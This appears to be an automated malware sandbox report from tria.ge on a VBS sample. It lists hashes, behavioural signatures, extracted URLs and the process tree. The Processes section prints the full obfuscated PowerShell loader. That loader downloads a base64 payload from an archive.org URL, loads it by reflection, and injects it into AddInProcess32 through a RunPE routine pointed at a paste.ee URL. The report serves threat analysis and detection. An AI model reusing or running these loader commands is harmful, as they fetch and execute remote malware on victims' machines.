Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02/10/2024, 03:22
Static task
static1
Behavioral task
behavioral1
Sample
41eb6115196af3892e27dba0a38c0376900f7d96b0e5721e4383b5e75d7379e7.vbs
Resource
win7-20240903-en
General
-
Target
41eb6115196af3892e27dba0a38c0376900f7d96b0e5721e4383b5e75d7379e7.vbs
-
Size
112KB
-
MD5
f182482644ecb63bbc8c1dac4fa0be31
-
SHA1
e946d969c0f37ae9b56d4851fd1f3dfa79f3c4a9
-
SHA256
41eb6115196af3892e27dba0a38c0376900f7d96b0e5721e4383b5e75d7379e7
-
SHA512
f5e1cbe338fb5252a00068a7dcd119f91b5a8d5e766725c609e3a68f1f02c91cc4dabf70ae88457c005f8d8ef592f34336f7e087de2514d6d3b26f4cce04a60e
-
SSDEEP
768:aNLgVRXrFjNlww2JSTnnLIJhG/Hqgt5pDt5j2GwgvxXy7yPcbE:qqXJZ6STnLIJh8qgt5pz2GwgvxXy73Q
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2612 powershell.exe 6 2612 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2760 powershell.exe 2612 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2760 powershell.exe 2612 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2760 powershell.exe Token: SeDebugPrivilege 2612 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2964 wrote to memory of 2760 2964 WScript.exe 30 PID 2964 wrote to memory of 2760 2964 WScript.exe 30 PID 2964 wrote to memory of 2760 2964 WScript.exe 30 PID 2760 wrote to memory of 2612 2760 powershell.exe 32 PID 2760 wrote to memory of 2612 2760 powershell.exe 32 PID 2760 wrote to memory of 2612 2760 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\41eb6115196af3892e27dba0a38c0376900f7d96b0e5721e4383b5e75d7379e7.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0OP0KCMON1F3DP2AT5XB.temp
Filesize7KB
MD5e65561684c2046d427a072d016b88177
SHA1f7fd32a53360f6b15b9894c46b9a5d7dfae2fd92
SHA256b9cb13e1a43f42ca9f580eedbf1a064d2afbd916f9c3d77c47cc58ccdcd7647b
SHA512c79c18c5cee7176dfda3cbf42b07f6680ef2086446a7fc89bbce0ea14028bafaa254184a6c641f46f13ad1eb7cbb374166922cf998d4caf5973f98f7b578ced8